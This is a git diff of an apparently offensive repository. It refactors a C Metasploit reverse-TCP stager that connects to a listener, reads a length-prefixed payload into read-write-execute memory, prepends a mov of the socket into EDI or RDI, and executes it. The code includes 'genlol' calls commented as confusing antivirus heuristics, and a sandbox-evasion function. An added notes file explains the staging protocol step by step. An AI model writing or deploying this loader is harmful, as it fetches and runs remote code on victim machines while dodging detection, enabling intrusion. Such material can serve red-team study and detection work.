diff --git a/.gitignore b/.gitignore index 092f515..1702a3a 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,9 @@ +################# +## Executable +################# +.exe +.o + ################# ## Eclipse ################# @@ -165,4 +171,4 @@ pip-log.txt # sublime text project files *.sublime-project -*.sublime-workspace \ No newline at end of file +*.sublime-workspace diff --git a/custom_meterp_bind.txt b/custom_meterp_bind.txt new file mode 100644 index 0000000..765e8d9 --- /dev/null +++ b/custom_meterp_bind.txt @@ -0,0 +1,21 @@ +* connect to the handler +* read a 4-byte length +* allocate a length-byte buffer +* mark it as writable and executable (on Windows you'll need VirtualProtect for this) +* read length bytes into that buffer +* jump to the buffer. easiest way to do this in C is cast it to a function pointer and call it. + +via egypt + +Assuming x86 arch, you have to make sure that the EDI register contains your socket descriptor (the value of the ConnectSocket variable). You can do this via inline asm, but it might be easier to just prepend the 5 bytes for setting it to your shellcode: + +BF 78 56 34 12  mov edi, 0x12345678 + +For 64 bit, you have to use the RDI register (and need 10 bytes): + +48 BF 78 56 34 12 00 00 00 00 mov rdi, 0x12345678 + +PS: This is the reason why the calling convention within Metasploit is +called "sockedi" + +Via Michael Schierl \ No newline at end of file diff --git a/loader.exe b/loader.exe deleted file mode 100755 index 05fa672..0000000 Binary files a/loader.exe and /dev/null differ diff --git a/main-timeobfs.c b/main-timeobfs.c index 7d4fe25..88b762a 100644 --- a/main-timeobfs.c +++ b/main-timeobfs.c @@ -132,67 +132,23 @@ int sandbox_evasion(){ //The metasploit-loader extracted into its own function. +//Works with 32 or 64 bit meterpreter depending on if ISX64 is defined or not void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort){ ULONG32 size; char * buffer; void (*function)(); - winsock_init(); + #ifndef ISX64 + //Not 64 bit + int movCmdSize = 1; + int ptrSize = 4; + char movCmd[] = {0xBF}; + #else + //Is 64 bit + int movCmdSize = 2; + int ptrSize = 8; + char movCmd[] = {0x48,0xBF}; + #endif - //start the socket homie - SOCKET my_socket = wsconnect(listenerIP, listenerPort); - //receive 4 bytes which indicates the size of the next payload - int count = recv(my_socket, (char *)&size, 4, 0); - //check for issues - if (count != 4 || size <= 0) - Kick(my_socket, "bad length value\n"); - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //allocate the RWX buffer - buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //check the buffer for issues - if (buffer == NULL) - Kick(my_socket, "bad buffer\n"); - //puts mov on to the front of the buffer - buffer[0] = 0xBF; - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //copies the socket pointer onto the buffer after 0xBF - //see this post for more infor http://mail.metasploit.com/pipermail/framework/2012-September/008664.html - memcpy(buffer + 1, &my_socket, 4); - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //receives the rest of the data from the socket (based on the size received before) - count = recv_all(my_socket, buffer + 5, size); - //cast the buffer as a function? - function = (void (*)())buffer; - //execute dat meterpreter - function(); -} - - -//The metasploit-loader for 64 bit systems -void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ - ULONG32 size; - char * buffer; - void (*function)(); winsock_init(); //start the socket homie @@ -209,7 +165,7 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ //================================ //allocate the RWX buffer - buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + buffer = VirtualAlloc(0, size + movCmdSize + ptrSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); //================================ //burn out the clock, and confuse heuristics with some random number generation @@ -220,17 +176,16 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ if (buffer == NULL) Kick(my_socket, "bad buffer\n"); //puts mov on to the front of the buffer - buffer[0] = 0x48; - buffer[1] = 0xBF; + memcpy(buffer, movCmd, movCmdSize); //================================ //burn out the clock, and confuse heuristics with some random number generation genlol(); //================================ - //copies the socket pointer onto the buffer after 0x48 0xBF + //copies the socket pointer onto the buffer after the move command //see this post for more infor http://mail.metasploit.com/pipermail/framework/2012-September/008664.html - memcpy(buffer + 2, &my_socket, 8); + memcpy(buffer + movCmdSize, &my_socket, ptrSize); //================================ //burn out the clock, and confuse heuristics with some random number generation @@ -238,7 +193,7 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ //================================ //receives the rest of the data from the socket (based on the size received before) - count = recv_all(my_socket, buffer + 10, size); + count = recv_all(my_socket, buffer + movCmdSize + ptrSize, size); //cast the buffer as a function? function = (void (*)())buffer; //execute dat meterpreter @@ -254,17 +209,9 @@ int main(int argc, char *argv[]) { //If command line parameters are given, use those instead of defaults. if(argc == 3){ - #ifdef ISX64 - reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2])); - #else - reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2])); - #endif + reverse_tcp_meterpreter(argv[1], atoi(argv[2])); }else{ - #ifdef ISX64 - reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort); - #else - reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort); - #endif + reverse_tcp_meterpreter(defaultListenerIP, defaultListenerPort); } return 0;